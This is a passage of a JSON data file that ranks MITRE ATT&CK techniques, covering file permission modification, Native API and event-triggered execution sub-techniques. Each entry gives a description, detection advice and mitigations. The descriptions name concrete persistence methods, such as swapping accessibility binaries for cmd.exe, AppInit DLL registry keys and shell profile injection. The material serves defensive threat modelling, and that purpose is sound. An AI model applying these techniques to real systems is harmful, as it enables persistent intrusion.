or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.", + "url": "https://attack.mitre.org/techniques/T1222", + "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)", + "score": 1.1114032758828571, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "subtechniques": [ + { + "tid": "T1222.001", + "name": "File and Directory Permissions Modification: Windows File and Directory Permissions Modification", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\nAdversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.", + "url": "https://attack.mitre.org/techniques/T1222/001", + "detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1222.002", + "name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.(Citation: 20 macOS Common Tools and Techniques) ", + "url": "https://attack.mitre.org/techniques/T1222/002", + "detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ] + }, + { + "rank": 47, + "tid": "T1106", + "name": "Native API", + "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via Disable or Modify Tools).", + "url": "https://attack.mitre.org/techniques/T1106", + "detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \nUtilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ", + "score": 1.1051660342857144, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ], + "subtechniques": [] + }, + { + "rank": 48, + "tid": "T1546", + "name": "Event Triggered Execution", + "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. \nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ", + "url": "https://attack.mitre.org/techniques/T1546", + "detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ", + "score": 1.0774153940638094, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1546.001", + "name": "Event Triggered Execution: Change Default File Association", + "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\nSystem file associations are listed under HKEY_CLASSES_ROOT.[extension], for example HKEY_CLASSES_ROOT.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT[handler]\\shell[action]\\command. For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)", + "url": "https://attack.mitre.org/techniques/T1546/001", + "detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.\nUser file association preferences are stored under [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.", + "mitigations": [] + }, + { + "tid": "T1546.002", + "name": "Event Triggered Execution: Screensaver", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n
    \n
  • SCRNSAVE.exe - set to malicious PE path
    • \n
  • ScreenSaveActive - set to '1' to enable the screensaver
    • \n
  • ScreenSaverIsSecure - set to '0' to not require a password to unlock
    • \n
  • ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed
    • \n
\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)", + "url": "https://attack.mitre.org/techniques/T1546/002", + "detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1546.003", + "name": "Event Triggered Execution: Windows Management Instrumentation Event Subscription", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.", + "url": "https://attack.mitre.org/techniques/T1546/003", + "detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent PowerShell cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + }, + { + "tid": "T1546.004", + "name": "Event Triggered Execution: Unix Shell Configuration Modification", + "description": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.", + "url": "https://attack.mitre.org/techniques/T1546/004", + "detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\nMonitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) \nFor most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1546.005", + "name": "Event Triggered Execution: Trap", + "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", + "url": "https://attack.mitre.org/techniques/T1546/005", + "detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.", + "mitigations": [] + }, + { + "tid": "T1546.006", + "name": "Event Triggered Execution: LC_LOAD_DYLIB Addition", + "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)", + "url": "https://attack.mitre.org/techniques/T1546/006", + "detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1546.007", + "name": "Event Triggered Execution: Netsh Helper DLL", + "description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)", + "url": "https://attack.mitre.org/techniques/T1546/007", + "detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)", + "mitigations": [] + }, + { + "tid": "T1546.008", + "name": "Event Triggered Execution: Accessibility Features", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n
    \n
  • On-Screen Keyboard: C:\\Windows\\System32\\osk.exe
    • \n
  • Magnifier: C:\\Windows\\System32\\Magnify.exe
    • \n
  • Narrator: C:\\Windows\\System32\\Narrator.exe
    • \n
  • Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe
    • \n
  • App Switcher: C:\\Windows\\System32\\AtBroker.exe
    • \n
", + "url": "https://attack.mitre.org/techniques/T1546/008", + "detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1546.009", + "name": "Event Triggered Execution: AppCert DLLs", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\nSimilar to Process Injection, this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ", + "url": "https://attack.mitre.org/techniques/T1546/009", + "detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1546.010", + "name": "Event Triggered Execution: AppInit DLLs", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)", + "url": "https://attack.mitre.org/techniques/T1546/010", + "detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1546.011", + "name": "Event Triggered Execution: Application Shimming", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n
    \n
  • %WINDIR%\\AppPatch\\sysmain.sdb and
    • \n
  • hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb
    • \n
\nCustom databases are stored in:\n
    \n
  • %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and
    • \n
  • hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom
    • \n
\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.", + "url": "https://attack.mitre.org/techniques/T1546/011", + "detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n
    \n
  • Shim-Process-Scanner - checks memory of every running process for any shim flags
    • \n
